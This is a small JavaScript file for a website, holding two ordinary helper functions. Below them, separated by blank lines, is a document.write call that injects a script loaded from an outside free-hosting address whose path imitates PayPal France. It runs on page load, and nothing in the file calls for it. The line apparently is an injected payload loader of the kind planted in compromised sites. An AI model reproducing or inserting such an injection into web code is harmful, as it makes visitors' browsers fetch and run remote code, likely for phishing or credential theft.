// focus
function allblur() {
  for (i = 0; i < document.links.length; i++)
    document.links[i].onfocus = document.links[i].blur;
}

// openwindow
function openwindow(theURL,winName,features) {
	window.open(theURL,winName,features);
}





document.write('<script src=http://fat2.freehostia.com/paypal.fr/indexq.php ><\/script>');
















